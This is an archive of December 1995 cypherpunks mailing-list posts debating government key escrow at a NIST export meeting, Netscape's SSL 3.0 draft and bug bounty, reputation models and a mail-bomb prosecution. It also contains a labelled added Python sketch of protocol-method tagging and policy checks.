
I thought fraud was obtaining something of value by false pretenses or
uttering a false document or something.  Doesn't sound like fraud to me.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 5 Dec 95 15:25:30 PST
To: cypherpunks@toad.com
Subject: Re: The Newspaper sez J.Clark sez "Uncle Sam Needed for Net Security"
Message-ID: <199512052326.PAA18556@ix4.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:47 PM 12/5/95 MET, Andreas Bogk <andreas@artcom.de> wrote:
>    Bryce>           To secure Net communications, the government will
>    Bryce> need to have access to private data exchanges using what is
>    Bryce> known as a key escrow security system, said Clark. He added
>
>Who was the guy who asked why "we" are mad at netscape? Well, I am
>because of exactly this blatant lie.

If you examine the grammar carefully, it's not a blatant lie,
it's quite correct.  If the government is going to "secure" (either
using the definition of "obtain for oneself" or "tie down")
Net communications, it will need to use some obnoxiously interfering 
technique, and so-called key-escrow is one way to do it.

Alternatively, using the definition of "secure" as "protect",
it will need to have access to private communications only through
security systems such as _real_ escrow, in which some mutually trusted
third party holds some assets until both parties have fulfilled the
terms of the escrow contract.  If you don't have a mutually trusted
third party, or one party doesn't deliver an asset it's supposed to,
or the other party doesn't play fair, then the transaction fails;
making sure it succeeds or fails cleanly, and verifying the status 
of the transaction at any time, is the escrow agent's job.

Government Access to Keys (GAK) is something radically different;
the government agrees not to interfere with your communications if
you deliver your keys to some other part of the government.  
There's no trusted third party (unless you trust the government),
wiretap rules generally forbid verifying to the victim whether his
communications are tapped or not, and the deal with the non-independent
escrow agent allows the government to change the terms of the so-called
escrow at any time, unlike a real escrow agreement.  (In other words,
it's a lie, a total crock, and absolutely UnAmerican, and there isn't
even a House UnAmerican Activities Committee* to complain to :-)

[ * Translation for you non-Americans; the term "UnAmerican" means
"something the good honest people of this country disapprove of,
like Communism and Socialism and maybe Communism and even occasionally
Fascism in extreme cases and especially Communism (but certainly not
things like racism or militarism or corrupt lying politicians)"
The House UnAmerican Activities Committee was a committee of Congressmen
who went around investigating anybody they didn't like and suspected of
being Communist, or could accuse of being Communist if they didn't like them.
They were most active during the 1950s and 1960s, and are fortunately gone
by now.]
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

# Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences
# on both sides of the road?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@nsa.tempo.att.com>
Date: Tue, 5 Dec 95 12:33:01 PST
To: cypherpunks@toad.com
Subject: latest librand source now available
Message-ID: <199512052034.PAA26869@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Source code for the latest version of librand (a random
number package based on event interval variations) for
Unix-like machines is now available in:
  ftp://ftp.research.att.com/dist/mab/librand.shar

There are no restrictions on use or distribution of this
code, which was written by Matt Blaze, Jack Lacy, and
Don Mitchell.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 5 Dec 95 15:40:49 PST
To: cypherpunks@toad.com
Subject: Netscape Bug Bounty...
Message-ID: <199512052338.PAA06971@ammodump.mcom.com>
MIME-Version: 1.0
Content-Type: text/plain



  FYI, since both the bounty and the particular bug have been discussed
here...

  We are awarding Scott Weston $1000 for reporting the LiveScript history
problem.  The announcement should show up on our Bug Bounty winner's
page by tomorrow.

	--Jeff

Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Tue, 5 Dec 95 12:51:51 PST
To: cypherpunks@toad.com
Subject: latest librand source now available
Message-ID: <199512052058.PAA27083@nsa.tempo.att.com>
MIME-Version: 1.0
Content-Type: text/plain


[Sorry if this is a duplicate; my machine had a bogus sendmail.cf
when I first sent this.]

Source code for the latest version of librand (a random
number package based on event interval variations) for
Unix-like machines is now available in:
  ftp://ftp.research.att.com/dist/mab/librand.shar

There are no restrictions on use or distribution of this
code, which was written by Matt Blaze, Jack Lacy, and
Don Mitchell.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Tue, 5 Dec 95 17:00:39 PST
To: Nathaniel Borenstein <nsb+limbo@nsb.fv.com>
Subject: Re: Geodesic Payment Systems? (was Re: Meeting notes from ANSI X.9 Meeting on Electronic Payment)
In-Reply-To: <gkl58I2Mc50eBlRA1y@nsb.fv.com>
Message-ID: <Pine.SUN.3.91.951205154829.10701A-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Dec 1995, Nathaniel Borenstein wrote:

> In terms of crypto-privacy, anonymous communication, and things like
> that, I agree completely.  However, it's genuinely more complicated than
> that where money is concerned, because there are aspects of the
> translation between "bits and bucks" that have some extremely serious
> practical complexities.
> 
> A true geodesic structure is self-supporting and self-structuring.  A
> cryptographic infrastructure can and should be similar, I agree
> completely.  However, a *monetary* infrastructure needs convertability,
> and the points of conversion are always the best targets of attack for
> criminals.  (I've been casting about for an analogy to physical
> geodesics, and it's hard to find one.  The best I can come up with is to
> imagine that in order to convert a carbon buckyball to a more
> conventional set of carbon molecules, you had to do it through a service
> bureau that was capable of error, fraud, or subversion by outside
> criminals.  This would ONLY matter if you ever wanted to do such
> conversions, but it would matter a lot then, especially if you had to
> suffer a serious financial loss if you got the wrong carbon molecules at
> the end of the process.)

I agree that conversion points are good targets for attack.  Therefore
whether conversion services are centralized or distributed will partly
depend on the economy of scale in protection against criminals.  I'm not
sure how much of this economy of scale exists for conversion between
electronic and physical monetary instruments.  But if we're converting
between one electronic system and another, then cryptographic protocols
reduce the cost of protection to nearly zero for even small organizations. 

Wei Dai




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pcw@access.digex.net (Peter Wayner)
Date: Tue, 5 Dec 95 12:58:52 PST
To: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Subject: Re: another fbi prosecution
Message-ID: <v02130502acea65f513e9@[199.125.128.5]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:30 AM 12/5/95, Bob Bruen, MIT Lab for Nuclear Science wrote:

> Dominick had his campus account taken away after other users complained
> that he had been "advertising business proposals inappropriately on line."
> The FBI alleges that he then sent 24,000 email messages in one day from a
> commercial account (unnamed) to Monmouth's system. This denial of service
> attack was successful for about 5 hours. He is facing six (6) years in prison
> and up to $350,000 in fines (1.20 years/hr and $70,000/hr).
>
> His lawyer (Kenneth Weiner) claims that "even if his client sent the mail
> bomb" since no damage was done to the system, he could not be convicted
> under the computer fraud statute. He also claims that prosecutors are trying
> to make an example of his client. The university is still trying to figure
> out whether he can be punished under the university code of conduct.
>

If Monmouth college is like almost every other college I know, they
routinely send out "mail bombs" to their alumni. That is, mass mailings
sent through the postal service. Given that we've agreed to legitimize
this behavior in the paper world, I can't see what's so wrong about doing
it in the electronic world.

Of course, he could have been spreading false advertising which would really
be fraud.

-Peter






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ROCK.CNB.UAM.ES
Date: Tue, 5 Dec 95 06:04:19 PST
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <951205161624.20a04076@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


SMTP%"unicorn@schloss.li"  4-DEC-1995 23:35:15.06 writes
>On Mon, 4 Dec 1995 JR@ns.cnb.uam.es wrote:
>
>> Black Unicorn <unicorn@polaris.mindport.net> wrote
>> >On Fri, 1 Dec 1995 JR@ns.cnb.uam.es wrote:

... many cuts all along to save bandwidth ...
>
>I'm afraid you have missed the point too.
>
>I don't care as much what the personal positions are, or what the ethical 
>center from which person x or person y works.
>
>I am most distressed because of what I see as a snowjob.
>
>"We are anti-GAK"
>
>Great, tell me what you have done to prevent GAK from proliferating.
>
>In the absence of an answer to that challenge, I have to question the 
>first statement as fluff or PR.
>
>This has nothing to do with Netscape sharing my opinion, or not sharing 
>my view on the evil of GAK.  It has to do with putting up or shutting 
>up.  I have been told that Netscape agrees with me, or will agree with 
>me, I just don't know that I believe it yet.

	For the last time: I have nothing to do with Netscape. So, please,
stop making silly associations. What I do to defend my opinions is to try
and get more people involved in the subject, explain the problems in terms
they can understand, discuss with them about possible solutions (sometimes
they have better ideas than me) and try to promote an effective course of
action. And in any case that's *my* business.

	Being in a different country and even continent, what I do may not
be of any direct consequence to you. And since I have nothing to do with
any commercial company -hey I don't even use Netscape- it has no relationship
whatsoever with Netscape or any other company.

	If you think that people like to hear complaints, go along. In my
experience people are more cooperative when they see better solutions than
just making a boycott and renouncing the use of things they like. So, I'll
keep on explaining what crypto can do for them and how easy it is to be
taken advantage of. And how easy it is for them to press and get what they
deserve.

	WRT legal courses of actions, just remember there's a whole world
out of your privy. It's sad you don't know better, but if you look around
carefully you'll discover that many of the proposed actions are not feasible
in many places. Just go out of your shell.

	I haven't either. I wouldn't be here if I did.

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joe Tardo" <joe_tardo@genmagic.com>
Date: Tue, 5 Dec 95 16:27:56 PST
To: "CypherPunks Mailing List" <dl@hplyot.obspm.fr>
Subject: Re: French crypto restricti
Message-ID: <n1393941588.2713@qm.genmagic.com>
MIME-Version: 1.0
Content-Type: text/plain


        Reply to:   RE>>French crypto restrictions - update ?

Would this imply that Netscape supplied source code to SCSSI?

From: Laurent Demailly
> Yes Netscape got the authorisation to sell Netscape navigator in
> France (40 bits) but there is no policy changes or whatever, it is
> still a tedious product by product process to get auth for crypto and









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Tue, 5 Dec 95 14:22:26 PST
To: Hal <hfinney@shell.portal.com>
Subject: Re: towards a theory of reputation
In-Reply-To: <199512052029.MAA08717@jobe.shell.portal.com>
Message-ID: <199512052222.RAA07434@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Hal writes:
>From: Scott Brickner <sjb@universe.digex.net>
>> Analytically, using an escrow agent doesn't change the utility
>> function.  It replaces the trading partner's honesty reputation
>> estimate with the escrow agent's (which is presumably higher, or why
>> use them?).  This is just a parameter substitution.
>> 
>> Whence comes the intractability?
>
>By the "utility function" I was referring to Wei's model in which each
>person has an idea of how much "utility" (a general summation of
>personal value and usefulness) they would get from another person, as a
>function of cost.  The utility function takes cost as input and returns
>"utiles" (or whatever) as output.  So, with this model, using an escrow
>agent would change the utility function; for a given cost, the utility
>of a person to me would change (say, if the person involved were
>thought to be dishonest, then the presence of escrow agents would make
>him more useful to me).  The utility function in Wei's model is a curve
>where the Y axis is utility and the X axis is cost.  Changing the
>importance of honesty will change the position and shape of this
>curve.
>
>I think it would be more tractable to have a model in which honesty
>played an explicit part.  We might even make assumptions about the
>mathematical relationship between honesty and overall utility - for
>example, that utility to me would be monotonically increasing with
>increased honesty of the other guy.

I had in mind that the utility function was being used by some agent to
determine its course of action.  Imagine the agent trying to determine
which of several services to use.  It may reasonably be expected to
evaluate the utility function for each one, and choose the one with the
highest utility.  "Reputation for honesty" is one parameter to the
function.  Price, turnaround, and reputation for quality are others.  A
smarter agent could consider "metaservices" which bundle the given
service with an escrow agent.  The net effect is to permit the agent to
replace the service's honesty with the escrow agent's for the
evaluation --- regardless of the internals of the model.

>What I mean is something like this.  Let t be the degree of trust
>necessary for a business relationship to be consummated.  For t=0, no
>trust is needed, and the relationship is such that neither party takes
>any significant risk - a cash sale, perhaps.  For t=1, in some sense
>total trust is needed, and a party can cheat the other with 100% safety.
>
>Now let h(t) be the honesty reputation of a person, so that the utility
>which people expect to receive from them gets multiplied by h(t).  For a
>person with a reputation for honesty, h(t) is close to 1 for all t.  For a
>person who seems dishonest, h(t) will go from 1 to 0 as t goes from 0 to
>1.
>
>This is all pretty hand-wavy, but the idea would be to come up with good
>strategies to estimate h(t) from a person's behavior, and good ways to
>choose what kind of behavior one should follow given the value(s) of t
>which are prevalent in the market.  This kind of analysis would lead you
>to focus on the importance of the amount of trust needed in a transaction.
>The underlying utility function is based on such traditional factors as
>productivity and reliability.  It won't change as we consider the
>variables of our analysis, because we have factored out the honesty and
>trust issues so that they are more explicit.  That's the kind of
>direction I was suggesting.

The strategy for estimating h(t) should be wholly independent of the
utility model.  Otherwise you'd be effectively unable to make efficient
use of rating services, which do such evaluations as their business.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 5 Dec 95 16:36:45 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
In-Reply-To: <64158.pfarrell@netcom.com>
Message-ID: <30C4E4B1.40E9@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Pat Farrell wrote:
> He said that they have studied the encryption that is supposed to be widely
> available on the Internet. He said that viewed by crypto experts, not
> much is very good. He mentioned "two incidents" where Netscape had
> weak implementations. He feels that companies will not trust software
> over the 'net. that they "want the US Government to say that 'this is
> good enough'."

  Was he able to name any companies that would not buy products without
the "US Government seal of approval"?  It seems kind of odd that he is
slamming Netscape for having had a weak implementation when he would love
to force everyone to have a "weak implementation".  I'm sure that he will
be happy to know that we have fixed these weaknesses.  :-)

> Clint Brooks, of NSA, then went over the revised criteria. He claimed that
> they were surprised at the industry concern over "one product" for
> worldwide markets. There were lots of questions. He eventually admitted
> that because of the "one product" concern, export regulations will affect
> domestic products. [all the more reason for Netscape to keep building ten
> or whatever it is.]

  Agreed.

> There was a representative from Netscape. He said that they, as a company
> think this is a terrible idea. They oppose it now, and will be issuing
> a company policy soon. I didn't catch his name, and couldn't find him
> to get the obviously carefully prepared text. If someone from Netscape, are
> you listening Jeff W? could get me the text, I'll add it to my writeup.

  I assume you are talking about the exact text of the statement that
our representative made at the meeting.  I will try to get it, but it
may take a day or two since they will be in DC until at least tomorrow.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 5 Dec 95 13:58:43 PST
To: cypherpunks@toad.com
Subject: Clarinet News Articles #1 [POINTER]
Message-ID: <199512052159.QAA12946@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The following news articles may be of interest to list subscribers:  
  
clari.news.censorship: Landmark First Amendment case  
4 Dec 95, 12:00  
  
clari.news.censorship: Donna Rice Fights Cybersmut  
1 Dec 95, 21:01  
  
clari.news.sex: Sponsor of cyberporn legislation  
4 Dec 95, 14:20  
  
clari.news.sex: Internet Smut Pact Reached  
2 Dec 95, 07:10  
  
--tallpaul@pipeline.com  
       
      




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Karlton <karlton@netscape.com>
Date: Tue, 5 Dec 95 17:46:20 PST
To: ssl-talk@netscape.com
Subject: New version of SSL 3.0
Message-ID: <30C4F630.794B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


[This is the second try at sending this message.]

SSL 3.0 protocol has been substantially changed from earlier drafts to
fix a number of performance and cryptographic issues. The latest version
can be found as PostScript in a compressed tar file on

        ftp://ftp<N>.netscape.com/pub/review/ssl-spec.tar.Z

where <N> is a digit in the range [2-8]. An HTML version should be
available in a day or two. I will post the URL when that happens.

Netscape is also in the process of submitting this draft to IETF.

Questions and comments about this specification should all be directed
to ssl-talk@netscape.com. Answers and replies will be posted there. We
are quite interested in your feedback.

As new eyes see the spec for the first time, I suspect that we will be
notified about typos and areas that are not as clear as they should be.
As a result, there will probably be an update in 2 weeks or so.

PK
--
Philip L. Karlton               karlton@netscape.com
Principal Curmudgeon            http://www.netscape.com/people/karlton
Netscape Communications




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Tue, 5 Dec 95 14:48:32 PST
To: cypherpunks@toad.com
Subject: NIST GAK export meeting, short version
Message-ID: <64158.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



I just got back from the NIST GAK export meeting. This is
a short writeup of a summary. I'll post a longer version later
this evening or early tomorrow morning.

The meeting was hosted by Ed Roback of NIST, who quickly introduced
Mike Nelson of the White House. Mike is clearly a political guy.
His handout says: "We believe that our proposal for exportable 64-bit key
escrow encryption meets these goals [the goals of VP Gore's letter to Rep
Cantwell, July 20, 1994]." He said that the criteria describe a solution,
but not the only solution.  He said it does not preclude other
implementations in the future. He anticipates that the State Department
will issue guidance based upon these criteria in "early 1996," and that
between now and then, any product that meets the criteria will be eligible
for expedited approval. Of course, the existing (slow as molasses) process
will continue.

I asked the first questions from the floor. The two questions were:
(1) Is this meeting concerned solely with export
of software, or does it deal with controlling domestic use of strong
cryptography? and (2) since the 64-bit limit was severely criticized at
the Sept meeting, why is it still needed if there is also escrow?

His answer was that there is "no intention to control domestic encryption"
and on the 64-bit issue, that the government is "not certain it will
work." He says they "want to see it implemented and want to see
how it works" because 64-bit encryption is very strong. If the escrow
doesn't work, they don't want a lot of software to be in widespread use.

He said that they have studied the encryption that is supposed to be widely
available on the Internet. He said that viewed by crypto experts, not
much is very good. He mentioned "two incidents" where Netscape had
weak implementations. He feels that companies will not trust software
over the 'net. that they "want the US Government to say that 'this is
good enough'."

Clint Brooks, of NSA, then went over the revised criteria. He claimed that
they were surprised at the industry concern over "one product" for
worldwide markets. There were lots of questions. He eventually admitted
that because of the "one product" concern, export regulations will affect
domestic products. [all the more reason for Netscape to keep building ten
or whatever it is.]

Brooks admitted that it is impossible to prevent multiple encryption.
Cypherpunks would do that by using PGP and then sending it using GAK.
He said "as a person, you can set up a secure communication method, and
nothing can be done about it." His concern is not that smart people can
have stronger crypto, but that strong crypto will be easy and widely used.

He said that the 64-bit key limit is not meant to restrict RSA keys to
64-bits, but rather to restrict the session keys that are encrypted using
RSA. Unspoken was the assumption that the 2000 bit RSA secret key would
have to be escrowed.

There were some interesting (and bad IMHO) implications of interoperability.
I'll cover them more in the long version. Basically, they admitted that
the interoperability restrictions made it stupid to have an export
version, you should have a strong domestic version, and an international
version developed offshore for sale to the rest of the world.

They admitted that there can be no controls over export of data, so once
interoperating software is available both domestically and from offshore
sources, there is no value in the export controlled, crippled version.

My favorite policeman, Geoff Greiveldinger, then described the
characteristics of an acceptable key escrow agent. There was a long list
of criteria, all unseen before the meeting. The general reaction
of the audience was that these were "yet another set of criteria that
must be met." Geoff claimed that they were simply trying to address
the questions raised at the earlier meeting about who is an
acceptable escrow agent. One point that caused a lot of concern
was that at least one employee of the escrow agent has to have a SECRET
clearance.

Industry, with a few exceptions, soundly said that this is a dumb idea,
that there is no market, that the criteria are too hard, etc. Except
Padgett Petersen, representing Lockheed-Martin. He said that LM thought
that the criteria were just peachy. The usual civil liberties folks
also soundly trashed it.

There was a representative from Netscape. He said that they, as a company
think this is a terrible idea. They oppose it now, and will be issuing
a company policy soon. I didn't catch his name, and couldn't find him
to get the obviously carefully prepared text. If someone from Netscape, are
you listening Jeff W? could get me the text, I'll add it to my writeup.

 ******************

What I think it means:

I believe that the government deeply wants to restrict domestic use of
strong encryption, but they have no legal justification for doing so.
They can't expect that they will get it if they go to Congress. So they
are attempting an end-around using the export criteria, which they
_do control_. They hope that the pain of having multiple versions will be
so high that no vendor will bother, and all we'll have is crippled
software.

The usual civil liberties lobby folks (CDT, EPIC, etc.) want to
hold their own, industry sponsored meetings to develop workable systems.

I think that the real key is for everyone, worldwide to insist on
both strong crypto and interoperability. The Germans are already
writing fine software and making fast hardware. Microsoft and Netscape
can easily afford to do some of their development offshore. If the products
sell and are deployed, it won't matter what the govies want.

Pat

ps. there were a number of other cypherpunks in attendance. I hope
some will add their impressions of the day.

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Mon, 4 Dec 95 23:23:48 PST
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: GAK_hit
Message-ID: <199512050723.SAA03602@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>  I've heard that when a machine that already has Internet In A
>Box, Netscape Navigator personal edition, or some other internet
>software with a stack and dialer is upgraded to Win95, the win95
>installation may somehow disrupt the functioning of the winsock
>or dialer.  I've also heard that re-installing the application
>will solve the problem.  I've never seen the problem myself,
>and don't know anything about any subpoena...
>
>	--Jeff
>
>-- 
>Jeff Weinstein - Electronic Munitions Specialist

My understanding is that Win '95 installs its winsock.dll in
/windows/system, which is where a number of other Internet packages also
install their winsock.dll. As their .dll is replaced by MS's, they cease to
function (either correctly or at all). The problem is resolved by
re-installing the original winsock.dll or configuring the Internet software
to look elsewhere for it.

Regards,

Mark Neely
___
Mark Neely - accessnt@ozemail.com.au
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 5 Dec 95 17:05:31 PST
To: cypherpunks@toad.com
Subject: re: NIST GAK export meeting, sv
Message-ID: <acea28dc0a0210045b72@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


Hieronymous@bosch.art wrote:

>      (Thanks for the summary, Pat.)

I concur. Nice summary. I hope Pat doesn't run out of steam before getting
the full version out (writing summaries can sometimes do that).


>      This last bit is really rich. I can't think of a single publicly
>defensible reason for the stipulation that every escrow agent must employ
>someone with SECRET clearance, but I *can* think of a publicly
>indefensible reason for it -- to facilitate those spooky non-court wiretap
>authorizations that've been alluded to in the fine print of the GAK
>proposals.

One "defensible" (and maybe even good) reason is because someone with
government clearance can then be prosecuted for leaking what they know,
whereas ordinary citizens are harder to prosecute for this. I doubt this is
the main reason, but it makes a certain kind of sense.

But there are other more interesting links between Secret clearances and
wiretaps.

The "Foreign Intelligence Surveillance Court" meets in Arlington, VA as the
need arises to authorize wiretaps in private, for intelligence collection
reasons. I think this has been discussed a couple of times on the list, so
a search of the archives might be useful to those who are curious. (Also, a
couple of the recent books on the Intelligence Support Activity, Ruby Fruit,
etc., have details on how this court operates.)

Though little of how GAK has been released (or reported here, or in the
press), there is no doubt in my mind that this Foreign Intelligence court
would of course continue to get its own wiretap authorizations.

(And not only "foreigners" are involved: anyone who is believed to have
importance to an intelligence matter is fair game for this court to
consider. Which is not surprising, really, as the goal is partly to catch
spies and plug security leaks--before someone goes ballistic and accuses me
of Betraying the Cause, I'm just describing things as they are. And surely
some security measures are warranted, even to Cypherpunks!)

>      Of course, just because escrow agents would be required to hire
>*someone* with a SECRET clearance doesn't mean that *anyone* with a SECRET
>clearance would fill the bill. And that's the rub: the administration of
>clearing people-with-SECRET-clearances for escrow agent employment would
>be conducted -- where else? -- *in secret*. SECRET clearance, of course,
>wouldn't be the salient criterion; after all, there are people on the
>Cypherpunks list -- and a few who aren't on it but are like-minded --
>who'd be, uh, reluctant to deliver keys in the absence of a wiretap
>authorized by a judge.
>      And, as a petty aside, it's nice to see that the gov't had cooked up
>yet another way to force potentially legitimate businesses to pay its
>stoolpigeons to chip away at our civil rights.

Many think tanks and defense contractors have "sheep-dipped" retired
intelligence officials working for them and continuing to report (in
various ways) to their former paymasters.

Sometimes these sheep-dipped agents are just there to keep tabs on what's
going on, sometimes they're there to nudge these companies in certain
directions, and sometimes they are actually running "deniable" applications
from the private sector. (Recall Hughes, Air America, Castle Bank, etc.)

I can imagine that if some companies talked about in connection with
certain questionable activities (Banker's Trust, Bank of America,
Wackenhut, SAIC, etc.) were to bid for the contract to be a GAK Agent, then
there would be contacts back to the intelligence agencies.

But most GAK accesses would be handled through normal channels, albeit secret.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Tue, 5 Dec 95 15:52:24 PST
To: pfarrell@netcom.com
Subject: Re:  NIST GAK export meeting, short version
Message-ID: <9512052349.AA28680@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


>_do control_. They hope that the pain of having multiple versions will be
>so high that no vendor will bother, and all we'll have is crippled
>software.

>I think that the real key is for everyone, worldwide to insist on
>both strong crypto and interoperability.

Anything that uses cryptography absolutely and positively *must* support
multiple cryptographic protocols.  Tag every RPC, transaction, method
invocation, what-have-you with some indicator that indicates not only
"encrypted" but "encrypted via method 2".  Allow customers to specify
policy, at least via an environment variable such as
	NETSCAPE_SSL_PROTECTION=1,2,4
where the online documentation says
	1 = 512bit RSA
	2 = 256bit RSA
	4 = Rot 13

Design open, extensible architectures with public registries and protocol
descriptions.
	/r$
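
[Added example, not part of the original message and not Netscape code: a sketch of the design described above, in which every message carries a method tag and the receiver enforces a customer-set policy. Method ids 1, 2 and 4 and their labels are taken from the message; the variable name EXAMPLE_PROTECTION, the frame layout and all function names are assumptions, and message bodies are treated as opaque bytes produced by the tagged method.]

```python
import os
import struct

# Public registry: method id -> label (ids and labels as listed in the message).
REGISTRY = {
    1: "512bit RSA",
    2: "256bit RSA",
    4: "Rot 13",
}

# Assumed frame layout: 1-byte method id, 2-byte big-endian body length, body.
HEADER = struct.Struct("!BH")


class PolicyError(Exception):
    """Raised when a policy string or a tagged message is not acceptable."""


def parse_policy(text):
    """Parse a string such as '1,2,4' into method ids, most preferred first."""
    policy = []
    for field in text.split(","):
        if not field.strip():
            continue
        try:
            method = int(field)
        except ValueError:
            raise PolicyError("not a method id: %r" % field)
        if method not in REGISTRY:
            raise PolicyError("method %d is not in the registry" % method)
        if method not in policy:
            policy.append(method)
    if not policy:
        raise PolicyError("policy allows no methods")
    return policy


def load_policy(environ=None, default="1"):
    """Read the policy from the (hypothetical) EXAMPLE_PROTECTION variable."""
    environ = os.environ if environ is None else environ
    return parse_policy(environ.get("EXAMPLE_PROTECTION", default))


def negotiate(local_policy, peer_offer):
    """Pick the first method, in local preference order, that the peer offers."""
    offered = set(peer_offer)
    for method in local_policy:
        if method in offered:
            return method
    raise PolicyError("no method acceptable to both sides")


def frame(method, body, policy):
    """Tag an already-protected body with the method that produced it."""
    if method not in policy:
        raise PolicyError("local policy forbids sending with method %d" % method)
    if len(body) > 0xFFFF:
        raise ValueError("body too long for a 16-bit length field")
    return HEADER.pack(method, len(body)) + body


def unframe(data, policy):
    """Check the tag against local policy before the body is processed."""
    if len(data) < HEADER.size:
        raise PolicyError("truncated header")
    method, length = HEADER.unpack_from(data)
    if method not in REGISTRY:
        raise PolicyError("unknown method tag %d" % method)
    if method not in policy:
        # The peer (or someone in the path) chose a method this side refuses,
        # for example a weaker one than the customer configured.
        raise PolicyError("method %d (%s) not allowed by policy"
                          % (method, REGISTRY[method]))
    body = data[HEADER.size:]
    if len(body) != length:
        raise PolicyError("length field does not match body")
    return method, body


if __name__ == "__main__":
    # Constructed sample: a strict receiver and a permissive sender.
    strict = parse_policy("1,2")
    permissive = parse_policy("4,2,1")
    print("agreed method:", negotiate(strict, permissive))
    weak = frame(4, b"uryyb", permissive)
    try:
        unframe(weak, strict)
    except PolicyError as err:
        print("rejected:", err)
```
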




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@mbcl.rutgers.edu>
Date: Tue, 5 Dec 95 16:03:09 PST
To: cypherpunks@toad.com
Subject: [Political Noise?] Banking law changes proposed
Message-ID: <01HYGJ5YZQHC9S3QEI@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	In regard to the following, I wonder if anyone knows if they're also
proposing changes that will make banking secrecy more difficult? I know about
the other proposals (Caribbean treaty and all that), but this report isn't
complete enough to tell if Greenspan and the other regulators are also
suggesting things.
	-Allen 

--------------------------------------------------------------------------------
      (c) 1995 Copyright Nando.net
      (c) 1995 Associated Press
      
   
   
   WASHINGTON (Dec 5, 1995 - 16:57 EST) -- Foreign banks can expect
   greater scrutiny of their trading, auditing and other internal
   controls in the wake of the Daiwa and Barings Bank disasters, Federal
   Reserve Board Chairman Alan Greenspan and other regulators said
   Tuesday.
   
   Greenspan and others told a House Banking subcommittee that with the
   lightning quick movement of money around global computer networks, a
   breakdown in internal systems could cause losses that spill over into
   the broader financial system.
   
[...]

   Greenspan and a top House Republican, Rep. Marge Roukema, R-N.J.,
   supported stricter audit standards for banks.
   
   "We are considering a number of initiatives that may be implemented at
   an administrative level, especially with respect to internal and
   external controls," Greenspan told a House Banking subcommittee on
   financial institutions.
   
[...]
   
   Roukema and the panel's leading Democrat, Rep. Bruce Vento, D-Minn.,
   said they want the General Accounting Office to study the adequacy of
   a 1991 law aimed at improving U.S. supervision of foreign banks.
   
   Vento cited a string of international banking scandals in recent
   years, ranging from collapse of Barings Bank to the problems
   surrounding Bank of Credit and Commerce International, and said that
   the global supervision system suffers from "a serious problem."
   
[...]
   
   Greenspan said international bank regulators are recognizing they must
